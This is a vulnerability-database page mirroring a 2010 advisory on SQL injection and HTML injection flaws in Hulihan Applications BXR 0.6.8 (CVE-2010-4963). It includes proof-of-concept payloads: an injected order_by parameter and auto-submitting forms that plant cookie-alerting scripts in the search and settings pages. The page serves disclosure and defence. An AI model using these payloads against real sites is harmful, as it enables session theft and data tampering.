Lucene search
+L

Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection

🗓️ 05 Aug 2010 00:00:00Reported by High-Tech Bridge SAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Hulihan Applications BXR 0.6.8 SQL Injection / HTML Injection via insufficient user input sanitatio

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2010-4963
9 Oct 201110:55
attackerkb
circl
Circl
CVE-2010-4963
5 Aug 201000:00
circl
cve
CVE
CVE-2010-4963
9 Oct 201110:00
cve
cvelist
Cvelist
CVE-2010-4963
9 Oct 201110:00
cvelist
euvd
EUVD
EUVD-2010-4927
7 Oct 202500:30
euvd
htbridge
htbridge
Multiple Vulnerabilities in BXR
22 Jul 201000:00
htbridge
nvd
NVD
CVE-2010-4963
9 Oct 201110:55
nvd
prion
Prion
Sql injection
9 Oct 201110:55
prion
source: https://www.securityfocus.com/bid/42247/info

Hulihan Applications BXR is prone to an SQL-injection vulnerability and multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.

Hulihan Applications BXR 0.6.8 is vulnerable; other versions may also be affected.

http://www.example.com/folder/list?order_by=filesize'+SQL


<form action="http://host/search/show_results" method="post" name="main" >

<input type="hidden" name="search_type" value="filename" />
<input type="hidden" name="search[query]" value=&#039;1"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="commit" value="Find!" />

</form>
<script>
document.main.submit();
</script>


mytagname"><script>alert(document.cookie)</script>


<form action="http://host/settings/update_settings" method="post" name="main" >

<input type="hidden" name="setting[site_title]" value=&#039;BXR File Management System"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="setting[site_keywords]" value="BXR, Open Source File Management System" />
<input type="hidden" name="setting[site_description]" value="The Free, Open Source, Ruby on Rails File Management System." />
<input type="hidden" name="setting[let_users_change_default_folder]" value="0" />
<input type="hidden" name="setting[use_ferret]" value="0" />
<input type="hidden" name="setting[overwrite_existing_files]" value="0" />
<input type="hidden" name="commit" value="Update Settings" />

</form>
<script>
document.main.submit();
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation